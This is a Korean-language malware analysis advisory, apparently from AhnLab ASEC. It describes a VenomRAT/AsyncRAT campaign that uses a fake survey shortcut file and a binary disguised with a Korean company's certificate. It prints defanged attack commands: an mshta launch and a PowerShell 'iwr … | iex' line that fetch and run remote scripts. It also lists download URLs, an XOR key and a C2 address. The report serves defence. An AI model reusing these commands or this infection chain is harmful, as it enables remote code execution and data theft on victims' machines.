국내 IT 기업을 사칭하여 유포되는 VenomRAT(AsyncRAT)
AhnLab SEcurity intelligence Center(ASEC)은 AsyncRAT(VenomRAT)을 다운로드하는 바로 가기 파일(.lnk)을 확인하였다. LNK 파일은 정상 워드 문서로 위장하기 위해 ‘설문조사.docx.lnk’ 파일명으로 정상 텍스트 문서와 함께 압축 파일로 유포되었다. 무엇보다 공격 과정에서 사용된 실행 파일(blues.exe)이 국내 기업의 인증서로 위장하고 있어 사용자의 각별한 주의가 필요하다.
악성코드의 전반적인 동작 과정은 다음과 같다.
압축 파일은 사용자의 열람을 유도하기 위해 ‘설문조사’로 위장하였으며 압축 파일 내부에는 텍스트 문서와 악성 LNK 파일이 포함되어 있다. 텍스트 문서 내부에는 악성 LNK 파일의 실행을 유도하는 문구가 작성되어 있다.
LNK 파일에는 악성 명령어가 포함되어 있어 실행 시 mshta를 통해 외부 URL에 접속해 추가 스크립트 코드가 실행된다.
- 실행 명령어
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe . $env:C:\W*\S*2\m*h?a.* ‘hxxp://194.33.191[.]248:7287/docx1.hta’
hxxp://194.33.191[.]248:7287/docx1.hta 에는 난독화된 문자열이 존재한다. 이를 디코딩하면 [그림 5]와 같이 추가 파일을 다운로드하여 %appdata% 폴더에 저장 후 실행하는 파워쉘 명령어가 확인된다.
- 다운로드 URL
hxxp://194.33.191[.]248:7287/qfqe.docx
hxxp://194.33.191[.]248:7287/blues.exe
다운로드 된 qfqe.docx 파일은 정상 워드 문서로 설문조사 관련 내용을 담고 있어 사용자가 악성 행위가 수행되고 있음을 알아차리기 어렵게 한다.
워드 문서와 함께 다운로드 된 blues.exe 파일은 국내 IT 기업의 인증서로 위장한 다운로더 유형의 악성코드이다. 실행 시 파워쉘을 통해 추가 스크립트 코드를 다운로드한다.
- 실행 명령어
powershell iwr hxxp://194.33.191[.]248:7287/sys.ps1 -UseBasicParsing | iex
위 blues.exe 파일을 통해 실행되는 sys.ps1 역시 다운로더 유형의 악성코드로 hxxp://194.33.191[.]248:7287/adb.dll 에서 추가 데이터를 다운로드하여 Fileless 형태로 실행한다.
adb.dll 은 내부에는 인코딩된 쉘코드가 존재하며, Base64 및 ‘sorootktools’ 문자열과의 XOR 연산을 통해 복호화된다.
최종적으로 실행되는 쉘코드는 RAT 유형 악성코드인 VenomRAT(AsyncRAT)으로 사용자 PC 정보 유출 및 키로깅을 수행한다. 또한, 공격자로부터 명령을 받아 다양한 악성 행위를 수행할 수 있다.
- C2 : 194.33.191[.]248:4449
정상 문서로 위장한 악성 바로가기 파일이 꾸준히 유포되고 있다. 바로가기 파일의 경우 파일명에서 ‘.lnk’ 확장자가 보여지지 않아 정상 문서 파일로 착각할 가능성이 높아 사용자의 각별한 주의가 필요하다.
[파일 진단]
Trojan/LNK.Runner (2024.01.16.00)
Trojan/HTML.Agent.SC196238 (2024.01.17.00)
Trojan/Win.Generic.C5572807 (2024.01.12.03)
Trojan/PowerShell.Agent (2024.01.17.00)
Trojan/Win.Generic.C5337844 (2022.12.21.00)
[행위 진단]
Execution/MDP.Powershell.M2514
AhnLab TIP를 구독하시면 연관 IOC 및 상세 분석 정보를 추가적으로 확인하실 수 있습니다. 자세한 내용은 아래 배너를 클릭하여 확인해보세요.
